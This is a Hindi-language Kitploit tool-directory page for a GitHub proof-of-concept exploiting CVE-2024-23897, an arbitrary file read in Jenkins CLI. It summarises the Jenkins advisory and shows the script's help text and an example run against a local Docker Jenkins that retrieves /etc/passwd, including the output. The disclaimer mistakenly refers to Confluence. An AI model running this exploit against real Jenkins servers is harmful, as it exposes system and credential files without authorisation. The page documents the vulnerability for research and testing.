Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-23897 — यह रिपॉज़िटरी CVE-2024-23897 का प्रूफ-ऑफ-कॉन्सेप्ट प्रस्तुत करती है। | Kitploit
उपकरण/GitHubGitHub/vozec/cve-2024-23897
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubvozec/cve-2024-23897

CVE-2024-23897

यह रिपॉज़िटरी CVE-2024-23897 का प्रूफ-ऑफ-कॉन्सेप्ट प्रस्तुत करती है।

रिपॉजिटरी देखें
1732 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-23897

यह रिपॉजिटरी CVE-2024-23897 का एक प्रूफ-ऑफ-कॉन्सेप्ट प्रस्तुत करता है (sonarsource द्वारा खोजा गया)

CVE-2024-23897 | jenkins में फ़ाइल पढ़ना

अस्वीकरण

यह कोड भेद्यता का एक प्रूफ-ऑफ-कॉन्सेप्ट है, मैं किसी को भी इसे उन confluence इंस्टेंस पर उपयोग करने के लिए प्रोत्साहित नहीं कर रहा हूँ जिनके वे स्वामी नहीं हैं।
यह उपकरण केवल शोध और शैक्षिक उद्देश्यों के लिए विकसित किया गया है और इसके किसी भी उपयोग के लिए मैं उत्तरदायी नहीं रहूँगा।

विवरण

के अनुसार Jenkins Security Advisory 2024-01-24 : Jenkins CLI कमांड को संसाधित करते समय Jenkins नियंत्रक पर कमांड तर्कों और विकल्पों को पार्स करने के लिए args4j लाइब्रेरी का उपयोग करता है। इस कमांड पार्सर में एक सुविधा है जो किसी तर्क में @ के बाद फ़ाइल पथ को फ़ाइल की सामग्री से बदल देती है (expandAtFiles)। यह सुविधा डिफ़ॉल्ट रूप से सक्षम है और Jenkins 2.441 और पुराने संस्करण, LTS 2.426.2 और पुराने संस्करण इसे अक्षम नहीं करते हैं। यह हमलावरों को Jenkins नियंत्रक प्रक्रिया की डिफ़ॉल्ट कैरेक्टर एन्कोडिंग का उपयोग करके Jenkins नियंत्रक फ़ाइल सिस्टम पर मनमानी फ़ाइलें पढ़ने की अनुमति देता है।

  • Overall/Read अनुमति वाले हमलावर संपूर्ण फ़ाइलें पढ़ सकते हैं।
  • Overall/Read अनुमति के बिना हमलावर फ़ाइलों की पहली कुछ पंक्तियाँ पढ़ सकते हैं।

सहायता

root@kitploit:~
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename

उदाहरण

root@kitploit:~
docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
root@kitploit:~
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

संदर्भ:

  • https://www.jenkins.io/security/advisory/2024-01-24/
  • https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
  • https://twitter.com/zin_min_phyo/status/1750827780856816063
टूल डाउनलोड करें